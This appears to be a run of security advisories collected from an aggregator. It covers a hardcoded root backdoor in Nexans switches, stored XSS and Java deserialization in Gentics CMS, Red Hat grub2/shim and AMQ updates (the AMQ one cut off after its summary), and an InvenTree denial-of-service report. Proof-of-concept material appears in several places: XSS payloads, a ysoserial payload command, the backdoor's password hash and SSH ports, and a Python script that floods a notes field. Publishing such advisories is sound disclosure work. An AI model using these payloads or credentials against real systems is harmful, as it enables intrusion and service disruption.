Nexans FTTO GigaSwitch industrial/office switches HW version 5 suffer from having a hardcoded backdoor user and multiple outdated vulnerable software components.

SEC Consult Vulnerability Lab Security Advisory < 20220615-0 >  
=======================================================================  
               title: Hardcoded Backdoor User and Outdated Software Components  
             product: Nexans FTTO GigaSwitch industrial/office switches HW version 5  
  vulnerable version: See "Vulnerable / tested versions"  
       fixed version: V6.02N, V7.02  
          CVE number: CVE-2022-32985  
              impact: High  
            homepage: https://www.nexans.com/  
               found: 2020-05-25  
                  by: T. Weber (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"As a global player in the cable industry, Nexans is behind the scenes  
delivering the innovative services and resilient products that carry thousands  
of watts of energy and terabytes of data per second around the world. Millions  
of homes, cities, businesses are powered every day by Nexans’ high-quality  
sustainable cabling solutions. We help our customers meet the challenges they  
face in the fields of energy infrastructure, energy resources, transport,  
buildings, telecom and data, providing them with solutions and services for the  
most complex cable applications in the most demanding environments."

Source: https://www.nexans.com/company/What-we-do.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Outdated Vulnerable Software Components  
A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that  
are used in the devices' firmware. Four of them were verified by using the  
MEDUSA scalable firmware runtime.

2) Hardcoded Backdoor User (CVE-2022-32985)  
A hardcoded root user was found in "/etc/passwd". In combination with the  
invoked dropbear SSH daemon in the libnx_apl.so library, it can be used on port  
50201 and 50200 to login on a system shell.

Proof of concept:  
-----------------  
1) Outdated Vulnerable Software Components  
Based on an automated scan with the IoT Inspector (ONEKEY) the following third party  
software packages were found to be outdated:

Firmware version 6.02L:  
BusyBox       1.20.2  
Dropbear SSH  2012.55  
GNU glibc     2.17  
lighttpd      1.4.48  
OpenSSL       1.0.2h

The following CVEs were verified with MEDUSA scalable firmware emulation:

* CVE-2015-9261 (Unzip)  
The crafted ZIP archive "x_6170921383890712452.bin" was taken from:  
https://www.openwall.com/lists/oss-security/2015/10/25/3  
Execution inside the firmware emulation:

bash-4.2# unzip x_6170921383890712452.bin  
Archive:  x_6170921383890712452.bin  
   inflating: ]3j½r«IK-%Ix  
do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc  
epc = 0044bb28 in busybox[400000+99000]  
ra  = 0044b968 in busybox[400000+99000]  
Segmentation fault

* CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)

PoC code was taken from:  
https://gist.github.com/dweinstein/66e6a088191ac0e8105c

* CVE-2015-7547 (getaddrinfo buffer overflow)

PoC code was taken from:  
https://github.com/fjserna/CVE-2015-7547

-bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &  
[1] 259  
-bash-4.4# chroot /medusa_rootfs/ bin/bash  
bash-4.2# cd /medusa_exploits/  
bash-4.2# ./cve-2015-7547_glibc_getaddrinfo  
[UDP] Total Data len recv 36  
[UDP] Total Data len recv 36  
Connected with 127.0.0.1:34356  
[TCP] Total Data len recv 76  
[TCP] Request1 len recv 36  
[TCP] Request2 len recv 36  
Segmentation fault

* CVE-2017-16544 (shell autocompletion vulnerability)

A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the  
vulnerability.  
-------------------------------------------------------------------------------  
# ls "pressing <TAB>"  
test  
]55;test.txt  
#  
-------------------------------------------------------------------------------

2) Hardcoded Backdoor User (CVE-2022-32985)  
The hardcoded system user, reachable via the dropbear SSH daemon was found due  
to multiple indications on the system. The undocumented root user itself was  
contained in the "passwd" file:

Content of the file "/etc/passwd".  
-------------------------------------------------------------------------------  
root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh  
[...]  
-------------------------------------------------------------------------------

A suspicious port for the SSH daemon was chosen in the config file of dropbear:

Content of the file "/etc/init.d/dropbear":  
-------------------------------------------------------------------------------  
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin  
DAEMON=/usr/sbin/dropbear  
NAME=dropbear  
DESC="Dropbear SSH server"  
PIDFILE=/var/run/dropbear.pid

DROPBEAR_PORT="50200 -p 50201"  
[...]  
-------------------------------------------------------------------------------

This is invoked from "/usr/lib/libnx_apl.so.0.0.0", which can be seen in the  
following pseudo-code:  
-------------------------------------------------------------------------------  
void dropbear_server_init(char param_1)

{  
   __pid_t __pid;  
   char *pcVar1;  
   int aiStack16 [2];

   __pid = fork();  
   if (__pid == 0) {  
     __pid = fork();  
     if (__pid != 0) {  
                     /* WARNING: Subroutine does not return */  
       exit(0);  
     }  
     if (param_1 == '\0') {  
       pcVar1 = "/etc/init.d/dropbear stop";  
     }  
     else {  
       pcVar1 = "/etc/init.d/dropbear start";                               <---  
     }  
     execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);  
   }  
   else {  
     waitpid(__pid,aiStack16,0);  
   }  
   return;  
}  
-------------------------------------------------------------------------------

This function is called if a specific command is issued in the CLI interface:  
-------------------------------------------------------------------------------  
[...]  
   iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);  
   if (iVar6 != 0) {  
     if (param_2 < 4) {  
       netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");  
       iVar6 = shared_mem_get_addr(&var_shm);  
       iVar7 = shared_mem_get_addr(&var_shm);  
       uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);  
       shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);  
       return;  
     }  
     iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);  
     if (iVar6 != 0) {  
       dropbear_server_init('\x01');                                        <---  
       netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");  
       return;  
     }  
     iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);  
     if (iVar6 != 0) {  
       dropbear_server_init('\0');                                          <---  
       netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");  
       return;  
     }  
     netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");  
     return;  
[...]  
-------------------------------------------------------------------------------  
The mentioned library is used in the CLI program that is running on the device.

Vulnerable / tested versions:  
-----------------------------  
The following firmware versions have been tested:

* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L  
* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M

Vendor contact timeline:  
------------------------  
2020-05-28: Contacting the vendor's PSIRT under the following link:  
             http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail  
      No answer.  
2020-06-08: Contacting vendor again via support.ans@nexans.com. Extended  
             deadline by 11 days.  
2020-06-16: Telephone call with Nexans representative. Security advisory was  
             received. It will be reviewed to confirm the found issues.  
2020-06-26: Telephone call with Nexans representative. Nexans is working on the  
             reported issues and will remove the dropbear daemon as first  
             measure.  
2020-08-04: Vendor stated that a fix for the outdated software components will  
             be available in November.  
2020-11-12: Asked for status update.  
2020-11-16: Contact stated, that firmware test will need more time. Updates are  
             estimated to be ready in Q1 of 2020.  
2020-11-20: Vendor confirmed Q1 as estimated disclosure date.  
2021-01-21: Asked for status update; Vendor stated that the release with all  
             fixes is aimed to be published end of Q1.  
2021-03-09: Asked for status update.  
2021-03-17: Vendor stated that the firmware is in testing stage. The fixed  
             firmware will be released in May.  
2021-06-10: Asked for status update.  
2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and  
             homeschooling. The fixed firmware will be released end of August.  
2021-08-31: Asked for status update.  
2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.  
2022-05-23: Informed vendor that the advisory will be released mid of June 2022.  
2022-05-24: Firmware V7.02 is available for download which fixes most outdated  
             components issues.  
2022-06-15: Release of security advisory.

Solution:  
---------  
The vendor provides an updated firmware here:  
https://www.nexans-ans.de/support/firmware/

Firmware version V6.02N has the backdoor removed and was already published a while ago.  
Version V7.02 also has the backdoor removed and most of the outdated software issues.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2022

Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor

Gentics CMS version 5.36.29 suffers from persistent cross site scripting and unsafe java deserialization vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220608-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting & Unsafe Java Deserializiation  
             product: Gentics CMS  
  vulnerable version: 5.36.29, see section below  
       fixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher  
          CVE number: CVE-2022-30981, CVE-2022-30982  
              impact: high  
            homepage: https://www.gentics.com/  
               found: 2021-04-02  
                  by: Gerhard Hechenberger (Office Vienna)  
                      Steffen Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"APA-IT Informations Technologie GmbH offers offers support with a focus on  
media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press  
Agency, we are responsible for the IT of the Austrian news agency as well  
as numerous other media enterprises.  
This expertise and insight into the industry make APA-IT an expert for IT  
solutions for publishers and media-related companies. Existing systems and  
tools are constantly developed and tailored to individual customer needs.  
As such, APA-IT is always available – from conception to operation."

Source: https://www.gentics.com/genticscms/company_gentics.en.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these products  
conducted by security professionals to identify and resolve all security  
issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
Multiple cross-site scripting vulnerabilities are present in the application.  
An attacker can store malicious JavaScript code in the username and profile  
description. The code will execute once an admin user hovers over the  
attacker's username. Thus, the attacker can execute code in the context of an  
admin.

2) Unsafe Java Deserialization (CVE-2022-30981)  
The Gentics CMS has an import option which will accept ZIP files. The archive  
includes a Java serialized object that gets deserialized on import. This can  
lead to code execution on the server.  
A low privileged user might be able to exploit this vulnerability by chaining  
it together with vulnerability 1).

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
To trigger the first XSS, an attacker has to change the profile description to  
include a payload, e.g. "<script>alert(document.domain)</script)". The payload  
will execute once a user with access to the userlist hovers his mouse over the  
profile name. The event "onmouseover" will trigger following code:

JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br>  
<script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' );

The execution of the code leads to following function:

function JSI3_comp_list_401__ass( obj, title, text, assTitle )  
{  
  JSI3_comp_list_401__assReset();  
  clearTimeout( JSI3_comp_list_401___ass_timeout );  
  JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle );  
}

The malicious code, which is contained in the "text" parameter, gets passed  
through to the next function. There it is added to an HTML element and thus  
executed in the browser.

function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) {  
  if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) {  
    JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true;  
    $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:''));  
    $(obj).tipsy({  
      trigger: 'manual',  
      html: true,  
      offset: 3,  
      delayIn: 900,  
      delayOut: 0,  
      opacity: 0.85,  
      gravity: 'nww'  
    });  
  }  
  $(obj).tipsy("show");  
  gcn_active_tipsy = obj;  
}

Another XSS vector can be found in the parameters "First Name" and "Last Name".  
By e.g. changing the last name to 'Node" onload="alert(document.domain)',  
JavaScript code is added to the profile picture that is loaded in the upper  
right corner on every page. The following snippet shows the vulnerable line of  
code:

<div id="profil">  
<div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div>

The third XSS is caused by changing the first and last name into JavaScript  
code without prior encoding. Changing the last name to  
"Last Name'+eval(alert(document.domain))+'" will cause the following code to be  
included in the server's response:

<script language="JavaScript" type="text/javascript">  
  var menus = new Array();  
  var imgs = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1;  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

2) Unsafe Java Deserialization (CVE-2022-30981)  
First, a malicious ZIP archive needs to be created. The following files will need to  
be included within this archive:

bundlebuild.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<bundlebuild>  
  <bundleinfo>  
    <name><![CDATA[test4]]></name>  
    <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>  
    <description><![CDATA[]]></description>  
    <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>  
    <globalprefix>D77D</globalprefix>  
  </bundleinfo>  
  <builds>  
    <build>  
      <builddate>1618996405</builddate>  
      <changelog><![CDATA[test4]]></changelog>  
      <count>0</count>  
    </build>  
  </builds>  
  <tables>  
  </tables>  
</bundlebuild>

containedobjects.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<objects>  
</objects>

The third file has to be named "serializedjava.bin" and contains the actual  
payload. A demo payload can be generated with following command:  
$ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin

Those three files have to be zipped together into an archive, which can be  
uploaded.

The import feature is available under Enterprise CMS -> Administration ->  
Import and Export. Now select New->Import and upload the malicious ZIP archive.  
Wait until the import completed. Now click on "Test succeeded" in the file  
list. On the new screen select "Start import in background". The payload should  
create a file called "upload_<random_uuid>.tmp" in the folder /tmp. It will  
contain the string "SECTEST".  
Better deserialization chains could be built to reach more interesting targets.  
It is very likely, that RCE could be obtained by writing an own deserialization  
chain.

Vulnerable / tested versions:  
-----------------------------  
The following product version has been tested and found to be vulnerable. Other versions  
are vulnerable as well, please see the vendor's changelog in the solution section.

* Gentics CMS 5.36.29

Vendor contact timeline:  
------------------------  
2022-04-04: Contacting vendor through support@gentics.com  
2022-04-04: Ticket SUP-13323 created.  
2022-04-05: Sent advisory via unencrypted email to provided vendor email address.  
2022-05-04: Updates for Gentics CMS were released on 14th April.  
2022-05-05: Gentics provides us with the fixed version numbers.  
2022-06-08: Release of security advisory.

Solution:  
---------  
Update to versions greater or equal to:  
* 5.40.27 (see https://gentics.com/Content.Node/changelog/5.40.0/5.40.27.html)  
* 5.41.15 (see https://gentics.com/Content.Node/changelog/5.41.0/5.41.15.html)  
* 5.42.7 (see https://gentics.com/Content.Node/changelog/5.42.0/5.42.7.html)  
* 5.43.1 (see https://gentics.com/Content.Node/changelog/5.43.0/5.43.1.html)

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Gerhard Hechenberger, Steffen Robertz / @2022

Gentics CMS 5.36.29 Cross Site Scripting / Deserialization

Red Hat Security Advisory 2022-5100-01 - The grub2 packages provide version 2 of the Grand Unified Boot Loader, a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. The shim package contains a first-stage UEFI boot loader that handles chaining to a trusted full boot loader under secure boot environments. Issues addressed include buffer overflow, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: grub2, mokutil, shim, and shim-unsigned-x64 security update  
Advisory ID:       RHSA-2022:5100-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5100  
Issue date:        2022-06-16  
CVE Names:         CVE-2021-3695 CVE-2021-3696 CVE-2021-3697   
                   CVE-2022-28733 CVE-2022-28734 CVE-2022-28735   
                   CVE-2022-28736 CVE-2022-28737   
=====================================================================

1. Summary:

An update for grub2, mokutil, shim, and shim-unsigned-x64 is now available  
for Red Hat Enterprise Linux 8.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, noarch, ppc64le, x86_64

3. Description:

The grub2 packages provide version 2 of the Grand Unified Boot Loader  
(GRUB), a highly configurable and customizable boot loader with modular  
architecture. The packages support a variety of kernel formats, file  
systems, computer architectures, and hardware devices.

The shim package contains a first-stage UEFI boot loader that handles  
chaining to a trusted full boot loader under secure boot environments.

Security Fix(es):

* grub2: Integer underflow in grub_net_recv_ip4_packets (CVE-2022-28733)

* grub2: Crafted PNG grayscale images may lead to out-of-bounds write in  
heap (CVE-2021-3695)

* grub2: Crafted PNG image may lead to out-of-bound write during huffman  
table handling (CVE-2021-3696)

* grub2: Crafted JPEG image can lead to buffer underflow write in the heap  
(CVE-2021-3697)

* grub2: Out-of-bound write when handling split HTTP headers  
(CVE-2022-28734)

* grub2: shim_lock verifier allows non-kernel files to be loaded  
(CVE-2022-28735)

* grub2: use-after-free in grub_cmd_chainloader() (CVE-2022-28736)

* shim: Buffer overflow when loading crafted EFI images (CVE-2022-28737)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1991685 - CVE-2021-3695 grub2: Crafted PNG grayscale images may lead to out-of-bounds write in heap  
1991686 - CVE-2021-3696 grub2: Crafted PNG image may lead to out-of-bound write during huffman table handling  
1991687 - CVE-2021-3697 grub2: Crafted JPEG image can lead to buffer underflow write in the heap  
2083339 - CVE-2022-28733 grub2: Integer underflow in grub_net_recv_ip4_packets  
2090463 - CVE-2022-28734 grub2: Out-of-bound write when handling split HTTP headers  
2090857 - CVE-2022-28735 grub2: shim_lock verifier allows non-kernel files to be loaded  
2090899 - CVE-2022-28737 shim: Buffer overflow when loading crafted EFI images  
2092613 - CVE-2022-28736 grub2: use-after-free in grub_cmd_chainloader()

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2):

Source:  
grub2-2.02-87.el8_2.10.src.rpm  
mokutil-0.3.0-9.el8_2.2.src.rpm  
shim-15.6-1.el8.src.rpm

aarch64:  
grub2-debuginfo-2.02-87.el8_2.10.aarch64.rpm  
grub2-debugsource-2.02-87.el8_2.10.aarch64.rpm  
grub2-efi-aa64-2.02-87.el8_2.10.aarch64.rpm  
grub2-efi-aa64-cdboot-2.02-87.el8_2.10.aarch64.rpm  
grub2-tools-2.02-87.el8_2.10.aarch64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.10.aarch64.rpm  
grub2-tools-extra-2.02-87.el8_2.10.aarch64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.10.aarch64.rpm  
grub2-tools-minimal-2.02-87.el8_2.10.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.10.aarch64.rpm  
mokutil-0.3.0-9.el8_2.2.aarch64.rpm  
mokutil-debuginfo-0.3.0-9.el8_2.2.aarch64.rpm  
mokutil-debugsource-0.3.0-9.el8_2.2.aarch64.rpm  
shim-aa64-15.6-1.el8.aarch64.rpm

noarch:  
grub2-common-2.02-87.el8_2.10.noarch.rpm  
grub2-efi-aa64-modules-2.02-87.el8_2.10.noarch.rpm  
grub2-efi-ia32-modules-2.02-87.el8_2.10.noarch.rpm  
grub2-efi-x64-modules-2.02-87.el8_2.10.noarch.rpm  
grub2-pc-modules-2.02-87.el8_2.10.noarch.rpm  
grub2-ppc64le-modules-2.02-87.el8_2.10.noarch.rpm

ppc64le:  
grub2-debuginfo-2.02-87.el8_2.10.ppc64le.rpm  
grub2-debugsource-2.02-87.el8_2.10.ppc64le.rpm  
grub2-ppc64le-2.02-87.el8_2.10.ppc64le.rpm  
grub2-tools-2.02-87.el8_2.10.ppc64le.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.10.ppc64le.rpm  
grub2-tools-extra-2.02-87.el8_2.10.ppc64le.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.10.ppc64le.rpm  
grub2-tools-minimal-2.02-87.el8_2.10.ppc64le.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.10.ppc64le.rpm

x86_64:  
grub2-debuginfo-2.02-87.el8_2.10.x86_64.rpm  
grub2-debugsource-2.02-87.el8_2.10.x86_64.rpm  
grub2-efi-ia32-2.02-87.el8_2.10.x86_64.rpm  
grub2-efi-ia32-cdboot-2.02-87.el8_2.10.x86_64.rpm  
grub2-efi-x64-2.02-87.el8_2.10.x86_64.rpm  
grub2-efi-x64-cdboot-2.02-87.el8_2.10.x86_64.rpm  
grub2-pc-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-debuginfo-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-efi-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-efi-debuginfo-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-extra-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-extra-debuginfo-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-minimal-2.02-87.el8_2.10.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.02-87.el8_2.10.x86_64.rpm  
mokutil-0.3.0-9.el8_2.2.x86_64.rpm  
mokutil-debuginfo-0.3.0-9.el8_2.2.x86_64.rpm  
mokutil-debugsource-0.3.0-9.el8_2.2.x86_64.rpm  
shim-ia32-15.6-1.el8.x86_64.rpm  
shim-x64-15.6-1.el8.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.2):

Source:  
shim-unsigned-x64-15.6-1.el8.src.rpm

x86_64:  
shim-unsigned-x64-15.6-1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-3695  
https://access.redhat.com/security/cve/CVE-2021-3696  
https://access.redhat.com/security/cve/CVE-2021-3697  
https://access.redhat.com/security/cve/CVE-2022-28733  
https://access.redhat.com/security/cve/CVE-2022-28734  
https://access.redhat.com/security/cve/CVE-2022-28735  
https://access.redhat.com/security/cve/CVE-2022-28736  
https://access.redhat.com/security/cve/CVE-2022-28737  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqtvfdzjgjWX9erEAQiAIg//WZryvXjfuG5H6OIgsh02jN2Ym4d2w9XI  
wNbHBa74FZUrClG83SDaOP7nzXE+ZW/ewORiJsQh0mreq0jEcNskTVeKZjVrI1sD  
NNBUQ86kF8uKff1haWc7+o19CYU8SFUXBua9YuwjEtDpyo91rSO8rED3cgc2M35x  
qjAh1i1ANDG5a+o8FSXUsXa60xhRPKIx3Zmvol0umWYIETonF+8Vil+EETeZ/E1Q  
pu9mG8Gcih3Z9b+kCUsXhwrXrySzT4bj+u8FTXGoEYcqRbnSVMS/kluNW9rx8jeO  
NrREm8pPado3Yw4owjkn6yyhLb2l3e7tJup6B9lXjKrERQLBzg913Ul52m85rcLF  
xEfKpWbdggT48ZGAGZpWfX30aVG0CJ2wVGE4GdEne8LJBA6AtJjfQ8wIWqWVzdZr  
rxu0vcDHXG4Iy6fuWHsT+Uj/XADQFW2cUuUbXRc1kNPlcJ+oDkqnqq/uM47LZPh0  
wXTIpKQ7PJE5U5F8L61pVIrRJjA6q9eQO4rj/bQaVgpPAK6tF84dS4t2R4qG4WwV  
N6twUzdhlS416gpsUN6cDeHPPjDmzAqYOQkPYbYGtNjktJEU2Bj6SytucKnMJ6bv  
itKave2dTGfQbNvrYl5uJX+z8Fk4wMInZ9C6E56lkqOGoSy1YOHLKUgOc2xkeSHY  
tO7oHuRGDc8=  
=xAIY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5100-01

Denial of Service in GitHub repository inventree/inventree prior to 0.8.0.

**Description**

The InvenTree application allows for the inclusion of notes for various objects in the application. The notes functionality does not include a character limit. An attacker can submit an infinite number of characters into the notes section, which causes a denial of service and increased processor usage for the victim. The tester tested against the Stock Parts and Parts notes sections. Tester assumes that other objects in the application that have notes available would also be vulnerable, however did not test it due to consumption of local resources.

Tester was able to add in excess of one hundred million (100,000,000) characters or more with the included PoC during testing.

**Proof of Concept**

    import requests as request_handler
    
    burp0_url = "http://192.168.1.5:8000/api/part/1/"
    burp0_cookies = {"csrftoken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "sessionid": "un2jcwzkr7ofla5c3vmfwfjw7z38blj3"}
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.5:8000/part/1/", "Content-Type": "application/json", "X-CSRFToken": "L433DJ0Xtp97EpAMROtkIyLX8KZsXWUxGYHZTcUET4WXL0EtbqgZYydelin9y4G7", "X-Requested-With": "XMLHttpRequest", "Origin": "http://192.168.1.5:8000", "DNT": "1", "Connection": "close"}
    echo_time = "A"*100000000
    burp0_json={"notes": echo_time}
    request = request_handler.patch(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
    print(request.text)
    print(request.status_code)
    

**Impact**

Should a user visit one of the exploited parts, the vulnerable page will not load appropriately. The victim may see their computer become unresponsive as the processor works to process the amount of data being served by the vulnerable notes section.

**Recommendation**

Apply a consistent character limit across the application where user input can be added to notes sections.

CVE-2022-2134: Lack of Character Limit in Notes Sections Leads to Denial of Service in inventree

Red Hat Security Advisory 2022-5101-01 - AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. This release of Red Hat AMQ Broker 7.10.0 serves as a replacement for Red Hat AMQ Broker 7.9.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat AMQ Broker 7.10.0 release and security update  
Advisory ID:       RHSA-2022:5101-01  
Product:           Red Hat JBoss AMQ  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5101  
Issue date:        2022-06-16  
CVE Names:         CVE-2019-10744 CVE-2020-36518 CVE-2021-4040   
                   CVE-2021-43797 CVE-2022-1833 CVE-2022-22968   
                   CVE-2022-23913   
=====================================================================

1. Summary:

Red Hat AMQ Broker 7.10.0 is now available from the Red Hat Customer  
Portal.

